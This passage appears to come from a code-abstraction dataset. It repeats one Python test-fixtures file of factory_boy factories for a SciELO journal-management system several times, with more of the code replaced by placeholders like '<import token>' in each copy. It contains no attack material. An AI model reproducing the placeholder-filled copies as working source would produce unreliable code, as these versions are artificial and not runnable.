= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n\n\nclass StudyAreaFactory(factory.Factory):\n <assignment token>\n <assignment token>\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = 
u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1'\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. 
Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1'\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SponsorFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass 
UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1'\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n 
reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1'\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass UseLicenseFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass 
CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1'\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR 